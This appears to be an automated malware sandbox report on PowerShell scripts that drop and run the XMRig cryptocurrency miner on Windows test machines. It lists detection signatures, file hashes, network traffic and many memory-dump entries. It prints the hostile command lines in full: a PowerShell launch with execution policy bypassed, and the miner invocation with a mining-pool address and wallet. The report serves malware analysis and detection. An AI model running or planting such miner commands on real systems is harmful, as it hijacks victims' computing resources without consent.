memory/1364-113-0x00007FF601560000-0x00007FF602193000-memory.dmp

memory/1364-114-0x00007FF601560000-0x00007FF602193000-memory.dmp

memory/1364-115-0x00007FF601560000-0x00007FF602193000-memory.dmp

memory/1364-116-0x00007FF601560000-0x00007FF602193000-memory.dmp

memory/1364-117-0x00007FF601560000-0x00007FF602193000-memory.dmp

memory/1364-118-0x00007FF601560000-0x00007FF602193000-memory.dmp

Analysis: behavioral26

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:47

Platform

win10-20240404-en

Max time kernel

1791s

Max time network

1794s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 58.189.79.40.in-addr.arpa udp
US 8.8.8.8:53 99.58.20.217.in-addr.arpa udp

Files

memory/4512-0-0x00007FFFE5A23000-0x00007FFFE5A24000-memory.dmp

memory/4512-5-0x000002AB45030000-0x000002AB45052000-memory.dmp

memory/4512-8-0x00007FFFE5A20000-0x00007FFFE640C000-memory.dmp

memory/4512-9-0x000002AB451E0000-0x000002AB45256000-memory.dmp

memory/4512-10-0x00007FFFE5A20000-0x00007FFFE640C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vuy4jagk.aqe.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4512-26-0x00007FFFE5A20000-0x00007FFFE640C000-memory.dmp

memory/4512-49-0x000002AB451B0000-0x000002AB451C2000-memory.dmp

memory/4512-62-0x000002AB45190000-0x000002AB4519A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4192-91-0x000001D500160000-0x000001D500180000-memory.dmp

memory/4192-92-0x00007FF709CF0000-0x00007FF70A923000-memory.dmp

memory/4512-93-0x00007FFFE5A23000-0x00007FFFE5A24000-memory.dmp

memory/4512-94-0x00007FFFE5A20000-0x00007FFFE640C000-memory.dmp

memory/4512-96-0x00007FFFE5A20000-0x00007FFFE640C000-memory.dmp

memory/4192-95-0x00007FF709CF0000-0x00007FF70A923000-memory.dmp

memory/4512-97-0x00007FFFE5A20000-0x00007FFFE640C000-memory.dmp

memory/4192-98-0x00007FF709CF0000-0x00007FF70A923000-memory.dmp

memory/4192-99-0x00007FF709CF0000-0x00007FF70A923000-memory.dmp

memory/4192-100-0x00007FF709CF0000-0x00007FF70A923000-memory.dmp

memory/4192-101-0x00007FF709CF0000-0x00007FF70A923000-memory.dmp

memory/4192-102-0x00007FF709CF0000-0x00007FF70A923000-memory.dmp

memory/4192-103-0x00007FF709CF0000-0x00007FF70A923000-memory.dmp

memory/4192-104-0x00007FF709CF0000-0x00007FF70A923000-memory.dmp

memory/4192-105-0x00007FF709CF0000-0x00007FF70A923000-memory.dmp

memory/4192-106-0x00007FF709CF0000-0x00007FF70A923000-memory.dmp

memory/4192-107-0x00007FF709CF0000-0x00007FF70A923000-memory.dmp

memory/4192-108-0x00007FF709CF0000-0x00007FF70A923000-memory.dmp

memory/4192-109-0x00007FF709CF0000-0x00007FF70A923000-memory.dmp

memory/4192-110-0x00007FF709CF0000-0x00007FF70A923000-memory.dmp

memory/4192-111-0x00007FF709CF0000-0x00007FF70A923000-memory.dmp

memory/4192-112-0x00007FF709CF0000-0x00007FF70A923000-memory.dmp

memory/4192-113-0x00007FF709CF0000-0x00007FF70A923000-memory.dmp

memory/4192-114-0x00007FF709CF0000-0x00007FF70A923000-memory.dmp

memory/4192-115-0x00007FF709CF0000-0x00007FF70A923000-memory.dmp

memory/4192-116-0x00007FF709CF0000-0x00007FF70A923000-memory.dmp

memory/4192-117-0x00007FF709CF0000-0x00007FF70A923000-memory.dmp

memory/4192-118-0x00007FF709CF0000-0x00007FF70A923000-memory.dmp

memory/4192-119-0x00007FF709CF0000-0x00007FF70A923000-memory.dmp

memory/4192-120-0x00007FF709CF0000-0x00007FF70A923000-memory.dmp

memory/4192-121-0x00007FF709CF0000-0x00007FF70A923000-memory.dmp

memory/4192-122-0x00007FF709CF0000-0x00007FF70A923000-memory.dmp

memory/4192-123-0x00007FF709CF0000-0x00007FF70A923000-memory.dmp

memory/4192-124-0x00007FF709CF0000-0x00007FF70A923000-memory.dmp

memory/4192-125-0x00007FF709CF0000-0x00007FF70A923000-memory.dmp

memory/4192-126-0x00007FF709CF0000-0x00007FF70A923000-memory.dmp

memory/4192-127-0x00007FF709CF0000-0x00007FF70A923000-memory.dmp

memory/4192-128-0x00007FF709CF0000-0x00007FF70A923000-memory.dmp

memory/4192-129-0x00007FF709CF0000-0x00007FF70A923000-memory.dmp

memory/4192-130-0x00007FF709CF0000-0x00007FF70A923000-memory.dmp

memory/4192-131-0x00007FF709CF0000-0x00007FF70A923000-memory.dmp

memory/4192-132-0x00007FF709CF0000-0x00007FF70A923000-memory.dmp

memory/4192-133-0x00007FF709CF0000-0x00007FF70A923000-memory.dmp

memory/4192-134-0x00007FF709CF0000-0x00007FF70A923000-memory.dmp

memory/4192-135-0x00007FF709CF0000-0x00007FF70A923000-memory.dmp

memory/4192-136-0x00007FF709CF0000-0x00007FF70A923000-memory.dmp

memory/4192-137-0x00007FF709CF0000-0x00007FF70A923000-memory.dmp

memory/4192-138-0x00007FF709CF0000-0x00007FF70A923000-memory.dmp

memory/4192-139-0x00007FF709CF0000-0x00007FF70A923000-memory.dmp

memory/4192-140-0x00007FF709CF0000-0x00007FF70A923000-memory.dmp

memory/4192-141-0x00007FF709CF0000-0x00007FF70A923000-memory.dmp

memory/4192-142-0x00007FF709CF0000-0x00007FF70A923000-memory.dmp

memory/4192-143-0x00007FF709CF0000-0x00007FF70A923000-memory.dmp

memory/4192-144-0x00007FF709CF0000-0x00007FF70A923000-memory.dmp

memory/4192-145-0x00007FF709CF0000-0x00007FF70A923000-memory.dmp

memory/4192-146-0x00007FF709CF0000-0x00007FF70A923000-memory.dmp

memory/4192-147-0x00007FF709CF0000-0x00007FF70A923000-memory.dmp

memory/4192-148-0x00007FF709CF0000-0x00007FF70A923000-memory.dmp

memory/4192-149-0x00007FF709CF0000-0x00007FF70A923000-memory.dmp

memory/4192-150-0x00007FF709CF0000-0x00007FF70A923000-memory.dmp

memory/4192-151-0x00007FF709CF0000-0x00007FF70A923000-memory.dmp

memory/4192-152-0x00007FF709CF0000-0x00007FF70A923000-memory.dmp

memory/4192-153-0x00007FF709CF0000-0x00007FF70A923000-memory.dmp

memory/4192-154-0x00007FF709CF0000-0x00007FF70A923000-memory.dmp

memory/4192-155-0x00007FF709CF0000-0x00007FF70A923000-memory.dmp

memory/4192-156-0x00007FF709CF0000-0x00007FF70A923000-memory.dmp

memory/4192-157-0x00007FF709CF0000-0x00007FF70A923000-memory.dmp

memory/4192-158-0x00007FF709CF0000-0x00007FF70A923000-memory.dmp

Analysis: behavioral29

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 21:07

Platform

win10v2004-20240508-en

Max time kernel

1790s

Max time network

1746s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 249.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.154:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 154.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
NL 23.62.61.154:443 www.bing.com tcp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 25.73.42.20.in-addr.arpa udp

Files

memory/4812-0-0x00007FFCA8C23000-0x00007FFCA8C25000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1cumut5f.tev.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4812-10-0x000002BFACDF0000-0x000002BFACE12000-memory.dmp

memory/4812-11-0x00007FFCA8C20000-0x00007FFCA96E1000-memory.dmp

memory/4812-12-0x00007FFCA8C20000-0x00007FFCA96E1000-memory.dmp

memory/4812-14-0x00007FFCA8C20000-0x00007FFCA96E1000-memory.dmp

memory/4812-16-0x000002BFAD1B0000-0x000002BFAD1BA000-memory.dmp

memory/4812-15-0x000002BFAD1C0000-0x000002BFAD1D2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3664-47-0x0000016608220000-0x0000016608240000-memory.dmp

memory/3664-48-0x0000016608260000-0x0000016608280000-memory.dmp

memory/3664-49-0x00007FF708120000-0x00007FF708D53000-memory.dmp

memory/3664-50-0x00007FF708120000-0x00007FF708D53000-memory.dmp

memory/4812-51-0x00007FFCA8C23000-0x00007FFCA8C25000-memory.dmp

memory/4812-52-0x00007FFCA8C20000-0x00007FFCA96E1000-memory.dmp

memory/3664-53-0x0000016608280000-0x00000166082A0000-memory.dmp

memory/3664-54-0x00000166082A0000-0x00000166082C0000-memory.dmp

memory/4812-55-0x00007FFCA8C20000-0x00007FFCA96E1000-memory.dmp

memory/3664-56-0x00007FF708120000-0x00007FF708D53000-memory.dmp

memory/3664-57-0x00007FF708120000-0x00007FF708D53000-memory.dmp

memory/3664-58-0x0000016608280000-0x00000166082A0000-memory.dmp

memory/3664-59-0x00000166082A0000-0x00000166082C0000-memory.dmp

memory/3664-60-0x00007FF708120000-0x00007FF708D53000-memory.dmp

memory/3664-61-0x00007FF708120000-0x00007FF708D53000-memory.dmp

memory/3664-62-0x00007FF708120000-0x00007FF708D53000-memory.dmp

memory/3664-63-0x00007FF708120000-0x00007FF708D53000-memory.dmp

memory/3664-64-0x00007FF708120000-0x00007FF708D53000-memory.dmp

memory/3664-65-0x00007FF708120000-0x00007FF708D53000-memory.dmp

memory/3664-66-0x00007FF708120000-0x00007FF708D53000-memory.dmp

memory/3664-67-0x00007FF708120000-0x00007FF708D53000-memory.dmp

memory/3664-68-0x00007FF708120000-0x00007FF708D53000-memory.dmp

memory/3664-69-0x00007FF708120000-0x00007FF708D53000-memory.dmp

memory/3664-70-0x00007FF708120000-0x00007FF708D53000-memory.dmp

memory/3664-71-0x00007FF708120000-0x00007FF708D53000-memory.dmp

memory/3664-72-0x00007FF708120000-0x00007FF708D53000-memory.dmp

memory/3664-73-0x00007FF708120000-0x00007FF708D53000-memory.dmp

memory/3664-74-0x00007FF708120000-0x00007FF708D53000-memory.dmp

memory/3664-75-0x00007FF708120000-0x00007FF708D53000-memory.dmp

memory/3664-76-0x00007FF708120000-0x00007FF708D53000-memory.dmp

memory/3664-77-0x00007FF708120000-0x00007FF708D53000-memory.dmp

memory/3664-78-0x00007FF708120000-0x00007FF708D53000-memory.dmp

memory/3664-79-0x00007FF708120000-0x00007FF708D53000-memory.dmp

memory/3664-80-0x00007FF708120000-0x00007FF708D53000-memory.dmp

memory/3664-81-0x00007FF708120000-0x00007FF708D53000-memory.dmp

memory/3664-82-0x00007FF708120000-0x00007FF708D53000-memory.dmp

memory/3664-83-0x00007FF708120000-0x00007FF708D53000-memory.dmp

memory/3664-84-0x00007FF708120000-0x00007FF708D53000-memory.dmp

memory/3664-85-0x00007FF708120000-0x00007FF708D53000-memory.dmp

memory/3664-86-0x00007FF708120000-0x00007FF708D53000-memory.dmp

memory/3664-87-0x00007FF708120000-0x00007FF708D53000-memory.dmp

memory/3664-88-0x00007FF708120000-0x00007FF708D53000-memory.dmp

memory/3664-89-0x00007FF708120000-0x00007FF708D53000-memory.dmp

memory/3664-90-0x00007FF708120000-0x00007FF708D53000-memory.dmp

memory/3664-91-0x00007FF708120000-0x00007FF708D53000-memory.dmp

memory/3664-92-0x00007FF708120000-0x00007FF708D53000-memory.dmp

memory/3664-93-0x00007FF708120000-0x00007FF708D53000-memory.dmp

memory/3664-94-0x00007FF708120000-0x00007FF708D53000-memory.dmp

memory/3664-95-0x00007FF708120000-0x00007FF708D53000-memory.dmp

memory/3664-96-0x00007FF708120000-0x00007FF708D53000-memory.dmp

memory/3664-97-0x00007FF708120000-0x00007FF708D53000-memory.dmp

memory/3664-98-0x00007FF708120000-0x00007FF708D53000-memory.dmp

memory/3664-99-0x00007FF708120000-0x00007FF708D53000-memory.dmp

memory/3664-100-0x00007FF708120000-0x00007FF708D53000-memory.dmp

memory/3664-101-0x00007FF708120000-0x00007FF708D53000-memory.dmp

memory/3664-102-0x00007FF708120000-0x00007FF708D53000-memory.dmp

memory/3664-103-0x00007FF708120000-0x00007FF708D53000-memory.dmp

memory/3664-104-0x00007FF708120000-0x00007FF708D53000-memory.dmp

memory/3664-105-0x00007FF708120000-0x00007FF708D53000-memory.dmp

memory/3664-106-0x00007FF708120000-0x00007FF708D53000-memory.dmp

memory/3664-107-0x00007FF708120000-0x00007FF708D53000-memory.dmp

memory/3664-108-0x00007FF708120000-0x00007FF708D53000-memory.dmp

memory/3664-109-0x00007FF708120000-0x00007FF708D53000-memory.dmp

memory/3664-110-0x00007FF708120000-0x00007FF708D53000-memory.dmp

memory/3664-111-0x00007FF708120000-0x00007FF708D53000-memory.dmp

memory/3664-112-0x00007FF708120000-0x00007FF708D53000-memory.dmp

memory/3664-113-0x00007FF708120000-0x00007FF708D53000-memory.dmp

memory/3664-114-0x00007FF708120000-0x00007FF708D53000-memory.dmp

memory/3664-115-0x00007FF708120000-0x00007FF708D53000-memory.dmp

memory/3664-116-0x00007FF708120000-0x00007FF708D53000-memory.dmp

memory/3664-117-0x00007FF708120000-0x00007FF708D53000-memory.dmp

memory/3664-118-0x00007FF708120000-0x00007FF708D53000-memory.dmp

Analysis: behavioral32

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 21:14

Platform

win11-20240426-en

Max time kernel

1797s

Max time network

1791s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/3044-0-0x00007FFB21403000-0x00007FFB21405000-memory.dmp

memory/3044-1-0x000001BB2A430000-0x000001BB2A452000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hhizu1f3.fjf.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3044-10-0x00007FFB21400000-0x00007FFB21EC2000-memory.dmp

memory/3044-11-0x00007FFB21400000-0x00007FFB21EC2000-memory.dmp

memory/3044-12-0x00007FFB21400000-0x00007FFB21EC2000-memory.dmp

memory/3044-14-0x000001BB42B20000-0x000001BB42B32000-memory.dmp

memory/3044-15-0x000001BB42B10000-0x000001BB42B1A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/596-46-0x000001B43CC90000-0x000001B43CCB0000-memory.dmp

memory/3044-48-0x00007FFB21400000-0x00007FFB21EC2000-memory.dmp

memory/596-49-0x000001B43CCE0000-0x000001B43CD00000-memory.dmp

memory/3044-47-0x00007FFB21403000-0x00007FFB21405000-memory.dmp

